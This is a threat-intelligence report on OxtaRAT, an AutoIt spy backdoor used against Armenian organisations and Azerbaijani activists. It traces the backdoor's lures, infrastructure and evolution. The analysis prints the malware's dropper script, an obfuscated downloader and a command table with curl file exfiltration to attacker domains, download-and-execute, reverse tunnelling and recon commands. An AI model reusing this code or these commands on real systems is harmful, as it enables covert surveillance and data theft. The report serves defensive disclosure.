Amid rising tensions between Azerbaijan and Armenia over the Lachin corridor in late 2022, Check Point Research identified a malicious campaign against entities in Armenia. The malware distributed in this campaign is a new version of a backdoor we track as OxtaRAT, an AutoIt-based tool for remote access and desktop surveillance.
Key findings:
In this report, we provide a full technical analysis of the OxtaRAT as well as its capabilities and evolution over the years. We also discuss the tactics, techniques and procedures (TTPs) of the threat actors, complete with an overview of their activity throughout the years.
The Republic of Artsakh, also known as the Nagorno-Karabakh Republic, is a breakaway region in the South Caucasus with a majority ethnic Armenian population but is recognized internationally as part of Azerbaijan. It is a de facto enclave within Azerbaijan, with the only land route to Armenia through the Lachin corridor, which has been under the control of Russian peacekeepers since the end of the Second Nagorno-Karabakh War in 2020.
The situation in Artsakh is tense, with frequent ceasefire violations and sporadic outbreaks of violence. For more than two decades, this unresolved highly militarized ethno-nationalist territorial conflict continues to be a source of tension between Armenia and Azerbaijan.
A malicious file named Israeli_NGO_thanks_Artsakh_bank_for_the_support_of.scr
was submitted to VirusTotal (VT) on November 29, 2022, from an IP address located in Yerevan, Armenia.
It is a self-extracting archive that masquerades as a PDF file and bears a PDF icon. Upon execution, it drops to the Temp folder of the infected device and executes a self-extracting cab called Alexander_Lapshin.EXE
. This in turn drops multiple additional files and executes one of them – the exec.bat
script. In its deobfuscated form, this script is very short:
@echo off xcopy /y /e /k /h /i * %appdata%\Autoit3\ copy /b /y %appdata%\Autoit3\Alexander_Lapshin.pdf %temp%\ start %temp%\Alexander_Lapshin.pdf start %appdata%\Autoit3\Autoit3.exe %appdata%\Autoit3\icon.png exit
The exec.bat
file is responsible for opening a lure PDF file that contains a Wikipedia article about Alexander Lapshin. At the same time, in the background, it copies multiple auxiliary files and the AutoIt interpreter to %appdata%\Autoit3\
and uses it to execute a malicious AutoIt code hidden inside an image called icon.png
Alexander Lapshin, a Russian-Israeli travel blogger, journalist, and human rights activist, was detained in Belarus in 2016 and extradited to Azerbaijan. He was sentenced to 3 years in prison for illegally crossing the internationally recognized borders of Azerbaijan, without authorization from the Azerbaijani authorities, in 2011 and 2012 while visiting Nagorno-Karabakh from Armenia. Nine months into his detention, in September 2017, Lapshin was attacked in a solitary confinement cell of a Baku pre-trial detention center. The attack was publicly declared by Azerbaijani officials to be a suicide attempt. Afterward, he was pardoned by the Azerbaijani President and deported to Israel.
In 2021, the European Court of Human Rights in the “CASE OF LAPSHIN v. AZERBAIJAN” ruled that Lapshin’s right to life had been violated by Azerbaijan authorities and mandated that Azerbaijan pay 30,000 Euros as compensation. After the verdict, Lapshin publicly posted a picture of the credit card he opened to receive his compensation, issued by the Armenian Artsakhbank. Likely, this incident made Lapshin’s name an attractive lure for the attackers targeting the bank.
As we mentioned previously, AutoIT.exe is used to run code from an image called icon.png
. This is a polyglot malware, combining valid JPEG and AutoIT A3X file formats:
AutoIT is a legitimate tool that is used by many IT administrators to automate tasks but is frequently abused by threat actors. In this case, the actors use a fully functional backdoor containing approximately 20,000 lines of obfuscated AutoIt code:
The backdoor, which we call OxtaRAT, contains a variety of capabilities typically associated with espionage activity. It contains commands that allow the attackers to:
The backdoor starts by first setting up its base folder, moving the icon.png
file there, and adding a persistence mechanism to run it every 2 minutes with AutoIt3.exe via a scheduled task named WallPaperChangeApp
. It also creates a working folder to store the results and logs of each command execution and sets hidden and system attributes for both base and working folders to conceal them from being easily discovered and arouse suspicion. It also downloads the legitimate curl executable and DLL, which are later used for some types of C&C communication.
The C&C server for this sample is edupoliceam[.]info
, a lookalike for the domain of the Police Education Complex of Police of the Republic of Armenia.
Next, the malware enters the main infinite loop, where in each step it performs the following actions:
.Most of the capabilities require additional files, mostly legitimate, to be downloaded during the malware execution from the path on the server /requirement/up/bin/
/requirement/up/bin/postup.exe (curl.exe) /requirement/up/bin/libcurl.dll /requirement/up/bin/vlc.zip /requirement/up/bin/7zxa.dll /requirement/up/bin/7za.exe /requirement/up/bin/7za.dll /requirement/up/bin/pscclient.exe (port scanner) /requirement/up/bin/ptun.exe (Plink) /requirement/up/bin/wintight.exe (TightVNC) /requirement/up/bin/wsrrun.exe (PHP CLI and PHP File Manager, https://sourceforge.net/projects/phpfm/) /requirement/up/bin/WinRAR32.zip /requirement/up/bin/WinRAR64.zip /requirement/up/bin/speedtest.zip (based on https://github.com/sivel/speedtest-cli) /requirement/up/bin/AppCrashCollector.exe (the “implant”) |
The only next-stage tool that wasn’t available on the server, was AppCrashCollector.exe
, whose download and execution are triggered by the implant
command. We assume that this is the payload that the actors attempt to hide from researchers and deliver to important targets only after additional checks are performed on the infected machine.
The communication between the malware and its C&C server is based on clear text commands, the arguments for each command are separated by the “|” sign.
The full list of commands supported by the backdoor:
command | parameters | description |
download | file name | Upload a file using curl (postup.exe): postup.exe -s -o nul -k --max-time 777 -A "Mozilla/5.0 (Windows NT 11.0; rv:54.0) Gecko/20100101 Firefox/96.1" -F "file=@"filename" https://edupoliceam[.]info/upload.php?GUID=<guid> . |
upload | file name | Download a file and save it with a specified filename and random prefix in the Temp directory. |
uploadexec | file name | Download and execute with wmic /node:%computername%" process call create $output_filename . |
aueval | expression to be evaluated | Execute a specified expression with AutoIT command Execute. |
makepersistent | Create a scheduled task called WallPaperChangeApp . | |
Implant | Download and execute AppCrashCollector.exe . | |
stopimplant | Kill the AppCrashCollector process with taskkill /IM and set settings.ini to 0. | |
search | path, pattern | Search for a pattern in a specified path with PowerShell -Noni -command '(get-childitem '" & $path & "' -Recurse -ea 0)| select Fullname | ? {$_.Fullname -like '" & $pattern & "'} | fl . |
listdesktop | List the contents of the Desktop folder with dir /s "%homepath%\Desktop . | |
listdir | directory path | List a specified directory recursively, including the last modified date and size. |
massdownload | path, filter | Upload files from a specified path with a specified filter (include/exclude), using curl for each file (the same way as the download command), with &MASSDL=1 parameter in the URL. |
massdownload2list | path, filter | List all files in a specified path matching the specified filter to the Thumb.db file. |
massdownload2 | path, filter, [range] | Upload files from a specified path from Thumb.db with POST request to the URL with &MASSDL2=1 parameter. |
webcamrecord | length | Webcam recording using VLC: $tmp_blcvid & "\blc\vlc\MediaRun.exe --no-qt-privacy-ask dshow:// --sout file/avi:" & $tmp_blcvid & "\webcam-video-record-" & $timestamp & "-sec-" & $chunk_length & ".avi --run-time=" & $chunk_length & " -Idummy --quiet vlc://quit" . The records are uploaded zipped using curl and are then deleted. |
desktoprecord | length | Desktop recording using VLC: $tmp_blcvid & "\blc\vlc\MediaRun.exe --no-qt-privacy-ask screen:// --sout file/avi:" & $tmp_blcvid & "\Desktop-video-record-" & $timestamp & "-sec-" & $chunk_length & ".avi --run-time=" & $chunk_length & " -Idummy --quiet vlc://quit" . The records are uploaded zipped using curl and then deleted. |
tightvnc | Download Wintight.exe (AutoIt compiled executable which extracts and runs tvnserver.exe) and execute it with wmic process call create . | |
killtightvnc | Kill TightVNC with taskkill /IM TVN* /F . | |
zipit | source, zip file name, destination, [filter] | Zip the folder using 7za.exe . |
unzipit | source, destination | Unzip the archive using 7za.exe . |
installrar | Download and unzip WinRAR. | |
rarit | source, destination, [extensions], [volume_size] | Archive the file/files with specific extensions from the folder using WinRAR. |
unrarit | source, destination | Extract the archive using Unrar.exe. |
reboot | Reboot with cmd.exe /c shutdown -r -t 0 /f . | |
curl | url | Execute the curl command: postup.exe -i -vvv -k --max-time 60 -A "Mozilla/5.0 (Windows NT 11.0; rv:54.0) Gecko/20100101 Firefox/96.0.1" & $url . |
portscan | ip/ip_range, port/port_range | Download and execute the portscan script (AutoIT-based pscclient.exe ) |
tunnel | server, user, password, port, host, host_port, local_port | Download, unzip and execute reverse port forwarding with plink: ptun.exe & $server & " -P " & $port & " -C -R" & $listen_port & ":" & $host & ":" & $host_port & " -l " & $user & " -pw " & $password . |
killtunnel | Kill the tunnel with taskkill /IM powers* /F & taskkill /IM ptun.exe . | |
wwwserv | Download, unzip and run PHP web server on port 3136 with PHP File Manager. This is done by downloading the AutoIT-based wsrrun.exe which extracts all needed files and executes php CLI as connectionlessupdate.exe -q -S -t <root folder> -H . | |
stopwwwserv | Kill the web server with taskkill /IM connectionle* /F . | |
wmicexec | process | Execute with 'wmic /node:' & %computername% & 'process call create' & $process . |
sysinfo | Collect system info with hostname & ipconfig /all & arp -a & getmac & net use & net share & quser /server:localhost & whoami /all & net user & systeminfo & wmic process get commandline & nslookup myip.opendns.com. resolver1.opendns.com . | |
getip | Get the IP address with nslookup myip.opendns.com resolver1.opendns.com. | |
showdrives | Get network drives with powershell -ep bypass -command get-psdrive . | |
proclist | Get the process list by wmic process get commandline . | |
speedtest | Download, unzip and execute Speedtest. | |
showagentversion | Return the agent version (version 11 is hardcoded in this specific sample). | |
tempclean | Clean the Temp folder with rmdir /q /s %temp%, mkdir %temp% . | |
radar | time | Exit if the time since the last call is smaller than the parameter. |
exitself | Exit. |
For the commands that require output, the final command line that was executed and its output are written to the working directory to the file with Random(1, 815782) & "-command-.txt"
Although not widely discussed, previous versions of the OxtaRAT backdoor were used in earlier attacks against Azerbaijani political and human rights activists – or, when the targets were not disclosed publicly, their lures referenced Azerbaijan-Armenia tensions around Artsakh. The older versions of OxtaRAT have significantly less functionality than the new variant but contain similar code and names for most of the commands and the same C&C communication pattern.
In July 2021, Qurium Media reported that several prominent human rights and political activists in Azerbaijan received targeted phishing emails that lured them to download malware from the Google Drive link. The link led to a password-protected RAR archive (the password was specified in the email) which in turn contained an Auto-IT compiled executable called “Human Rights Invoice Form Document -2021.exe"
. When executed, it downloaded from the C&C server shoesbuysellone[.]live
the main AutoIT malware (md5: 0360185bc6371ae42ca0dffe0a21455d). Although it doesn’t contain a hardcoded “agent version” number, we can clearly see that this is an earlier version of OxtaRAT. It has very similar functionality and code, but supports fewer commands (11 in total):
download implant stopimplant massdownload webcamrecord desktoprecord | makepersistent aueval upload uploadexec wmicexec |
In August 2021, another sample was observed, this time submitted to VirusTotal from Armenia. The file called REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION (Final Updated 2021).scr
also bears the PDF icon, and when executed, presents the victim with the following PDF lure:
In the background, it downloads the main malware from the C&C server https://www.filecloudservices.xyz/wp-comment.php
and saves it as PhoneAppService.Exe
. The code of this version implements the same string obfuscation as the newest version:
$koda_gui = StringFromASCIIArray(StringSplit("77|111|122|105|108|108|97|47|53|46|48|32|40|76|105|110|117|120|59|32|85|59|32|65|110|100|114|111|105|100|32|52|46|48|46|51|59|32|107|111|45|107|114|59|32|76|71|45|76|49|54|48|76|32|66|117|105|108|100|47|73|77|76|55|52|75|41|32|65|112|112|108|101|87|101|98|107|105|116|47|53|51|52|46|51|48|32|40|75|72|84|77|76|44|32|108|105|107|101|32|71|101|99|107|111|41|32|86|101|114|115|105|111|110|47|52|46|48|32|77|111|98|105|108|101|32|83|97|102|97|114|105|47|53|51|52|46|51|48|32|49|56|46|51", "|"), 1) // Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 18.3 FileInstall(".\REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf", @AppDataDir & "\" & "REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf", 1) $n = StringFromASCIIArray(StringSplit("104|116|116|112|115|58|47|47|119|119|119|46|102|105|108|101|99|108|111|117|100|115|101|114|118|105|99|101|115|46|120|121|122|47|119|112|45|99|111|109|109|101|110|116|46|112|104|112", "|"), 1) //https://www.filecloudservices.xyz/wp-comment.php $m = StringFromASCIIArray(StringSplit("80|104|111|110|101|65|112|112|83|101|114|118|105|99|101|46|69|120|101", "|"), 1) //PhoneAppService.Exe Run(@ComSpec & " File.txt /" & "c " & StringFromASCIIArray(StringSplit("115|116|97|114|116", "|"), 1) & " " & @AppDataDir & "\" & "REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf", @AppDataDir, @SW_HIDE) HttpSetUserAgent($koda_gui) HttpSetProxy(1) InetGet($n, @TempDir & "\" & $m, 1)
In February of last year, Qurium reported another attack, this time targeting Abulfaz Gurbanli, an Azerbaijani political activist. The attackers pretended to be BBC journalists and, similar to the June 2021 attacks, sent the victim an email which contained a Google Drive link, pointing to a password-protected RAR archive called BBC-suallar.rar
(“BBC questions”). Once again, a AutoIT-compiled executable called suallar.scr
was extracted. This time, it masqueraded as a Word document, complete with a Word icon. Upon execution, it presented the lure DOC file called smm-fraza.doc
In the background, it downloaded from the C&C server https://smartappsfoursix[.]xyz/wp-feed.php
and run another version of OxtaRAT. This is a more advanced version, compared to the 2021 attacks, with many additional commands added (29 in total):
download aueval upload uploadexec exittemp implant stopimplant radar massdownload webcamrecord desktoprecord makepersistent untrace wwwserv stopwwwserv | curl reboot zipit unzipit tunnel tightvnc wmicexec search sysinfo showdrives getip listdesktop killtightvnc killtunnel |
The version from June 2021 was capable only of downloading and exfiltrating files, executing the binaries and AutoIT code, and recording data from the desktop and web camera. In contrast, the version observed in February 2022 is a more powerful malware with a lot of additional features. The actors added capabilities to improve local file enumeration (list files on the desktop, search for specific files), collect data about the compromised system, work with zip files, and, most importantly, improved the ways they can access and control the infected machine by adding commands to install TightVNC or the PHP web server.
The first change that the actors implemented in their latest attack is in the infection chain. Previously, the initial .SCR files, masquerading as Word or PDF documents, served only as downloaders. They sent a request to WordPress-like URLs on the C&C server (wp-feed.php
, wp-comment.php
, etc) and then executed the main malware received from the attackers’ server. In the latest campaign, the .SCR file already contains the OxtaRAT backdoor, as a polyglot file. This saves the actors from needing to make additional requests for binaries to the C&C server and attracting unnecessary attention, as well as hides the main malware from being easily discovered on the infected machine, as it looks like a regular image and bypasses type-specific protections.
The actors added an additional measure to protect their infrastructure, geofencing the C&C domains that store the auxiliary tools and additional payloads. This is a technique currently used by many experienced threat actors to make sure that the proper execution flow is not triggered by sandboxes or researchers, but only on the targeted machines. In this case, the actors limited their operations to Armenian IP addresses.
Since the previous publicly disclosed version, OxtaRAT was updated with 10 additional commands introducing new functionality. Most of the new features aim to improve the ways to steal the victim’s data. For example, they implemented the listdir
command to recursively enumerate the files in a specified folder, collecting additional data such as the last modified date and size. The previously existing command massdownload
, which is used to exfiltrate files of predefined types, was also updated with a few new file extensions (marked in bold):
As can be seen from this snippet, the actors are now interested in additional file types related to Oracle and Microsoft Access databases. This is an interesting development, as it indicates they may be broadening their targets to include corporate networks or specific individuals, as common private computers rarely contain personal files in DB formats.
The actors also implemented “advanced” mass-download commands such as the massdownload2
and massdownload2list
that allow the actors to enumerate and exfiltrate specified filetypes more conveniently. In addition, they implemented functions to work with RAR archives (installrar
, rarit
, unrarit
) which, along with the clear benefits of uploading the auxiliary tools inside RAR archives to the infected machines, enable the actors to archive all the files of their interest to the multi-volume RAR archive. The default list of extensions provided in the code of the rarit
exfiltration function shows a focus on documents, pictures, archives, and databases:
Func rar_it($source_file_or_dir, $destination_path, $extensions_to_rar = "*.xls;*.xlsx;*.doc;*.docx;*.pdf;*.rar;*.zip;*.tar;*.tar.gz;*.sql;*.txt;*.mdb;*.jpg;*.jpeg;*.accdb", $parts = "12M")
Another interesting feature included in the most recent version is the speedtest
command which invokes Speedtest CLI, a dedicated tool to test the speed and performance of an internet connection. As the malware is not only capable of collecting a large quantity of files but also recording video from a web camera and screen, it can produce significantly large outputs with gigabytes of data. Therefore, for the sake of OPSEC, to hide the extensive data exfiltration the actors likely needed a way to control and estimate the upload all of the collected information to their servers.
The last feature added to the data collection mechanism is a proclist
command, which uses WMIC to retrieve the command line for each of the processes. This feature might be used for evasion purposes, so the actors can make sure they are running in an actual environment as opposed to a sandbox, as well as to learn more about the software configurations running on the victim’s machine.
One of the unexpected features that we found during this investigation is the portscan tool, which is included only in the newer version of the backdoor. The port scanner, pscclient.exe
, is an Auto-IT based non-obfuscated TCP Connect tool that can scan a specified range of IP addresses and a range of ports. The default range of ports configured in the tool includes both well-known and non-standard ports:
Global $port_range[100] = [135, 4444, 136, 137, 138, 139, 20, 21, 22, 23, 80, 443, 445, 8443, 8080, 3131, 3128, 5681, 5060, 5061, 3389, 33899, 33399, 3390, 389, 4000, 1433, 1521, 9222, 45687, 7292, 789, 50022, 2109, 2233, 55522, 33391, 33392, 33390, 33394, 33389, 33398]
OxtaRAT, which previously had mostly local recon and surveillance capabilities, can now be used as a pivot for active reconnaissance of other devices. This may indicate that the threat actors are preparing to extend their main attack vector, which is currently social engineering, to infrastructure-based attacks. It also might be a sign that the actors are moving from targeting individuals to targeting more complex or corporate environments.
Our search for domains with similar characteristics to edupoliceam[.]info
led to more active domains: filesindrive[.]info
, mediacloud[.]space
and avvpassport[.]info
. All the domains are registered with NameCheap. While filesindrive[.]info
and mediacloud[.]space
, similar to filecloudservices[.]xyz
used in back in 2021, have a generic reference to cloud file storages, the domain avvpassport[.]info
is more specific, and it masquerades as the Passport and Visa Office of the Republic of Armenia. Both of these domains, edupoliceam[.]info
and avvpassport[.]info
, were created on September 23, 2022, and were likely also used for other attacks on Armenian targets.
At the beginning of our investigation, all of these domains used Cloudflare services to hide their IP addresses. Due to their configuration, by looking for IP addresses with the same behavior, we identified 38.242.197[.]156
as likely their real IP address. While we were completing the investigation and notifying the relevant parties, Cloudflare blocked these domains as malicious, and they all started to publicly resolve to their real IP address 38.242.197[.]156
Alexander Lapshin, whose name is used in the lure, shared that on the same day the samples were uploaded to VT, the representatives of Artsakh bank notified that they received malicious emails in his name. This information was also later confirmed by Cyberhub-AM, digital security helpdesk for Armenian civil society. Due to the infrastructure revealed, we believe that there might have been other targets of this campaign in Armenia as well.
All of the samples from this campaign and earlier ones are related to Azerbaijani government interests; they either targeted Azerbaijani political and human rights activists or, if the targets were not disclosed publicly, reference tensions between Azerbaijan and Armenia over Artsakh/Nagorno-Karabakh. Meta, in their Adversarial Threat Report Q1-2021, attributed the previous campaigns reported by Qurium to the Azeri Ministry of Internal Affairs. However, no technical analyses were provided.
In 2017, Amnesty International reported a campaign that started as early as November 2015 and continued through 2017. This campaign used Autoit malware called AutoItSpy against Azerbaijani dissidents, and was later connected by Qurium to other “denial-of-service attacks, intrusion attempts, spear-phishing campaigns and electronic media monitoring from Internet infrastructure associated with the Government of Azerbaijan.” The AutoItSpy malware used at the time had the ability to log the keystrokes and collect screenshots, exfiltrating both of them over SMTP protocol.
Even though we couldn’t find any infrastructure overlap with our campaign (considering a gap of a few years and public exposure of previous attacks), there is a significant overlap in major TTPs:
Although it is tricky to compare the code of tools with different functionality (keylogger compared to a full-blown surveillance tool), there are a few high-level overlaps in the coding style of these tools:
%random% %random% %random%
in all the batch scripts, immediately setting file attributes with FileSetAttrib($dir, "+SH")
for all the newly created folders, excessive usage of the Random
function, etc.Based on these similarities in TTPs, code and targeting, we can conclude with medium confidence that both cases involve the same threat actors. We can also speculate that the missing “implant” in OxtaRAT that we were unable to access might be a keylogger; not only is it an important functionality missing from OxtaRAT’s multi-functional surveillance arsenal, but also the actors might take extra measures to avoid revealing it to anyone except the targets, possibly to avoid attribution based on already uncovered information.
In this article, we describe the latest attack and the evolution of the tools in the campaigns against Armenian targets, as well as Azerbaijani activists and dissidents. All the details indicate that the underlying threat actors have been maintaining the development of Auto-IT based malware for the last seven years, and are using it in surveillance campaigns whose targets are consistent with Azerbaijani interests.
Check Point’s Threat Prevention Engines provides comprehensive coverage of attack tactics, file-types, and operating systems and protects against attacks such as described in this research. ThreatCloud is Check Point’s rich cyber defense database. Its threat intelligence powers Check Point’s zero-day protection solutions.
Check Point products provide the following coverage against this threat:
6ac414fad3d61ad5b23c2bcdd8ee797f ddac9a1189e4b9528d411e07d0e98895 0360185bc6371ae42ca0dffe0a21455d ddac9a1189e4b9528d411e07d0e98895 1c94f1c6241cb598da5da7150a0dc541 df9673032789847a367df9923bbd44d2 a1a39e458977aa512b7ff2ba1995b18d cf225029cade918d92b4b4e2b789b7a5 86b5245112436e8a5eabf92fab01ffba edupoliceam[.]info filesindrive[.]info mediacloud[.]space avvpassport[.]info filecloudservices[.]xyz 38.242.197[.]156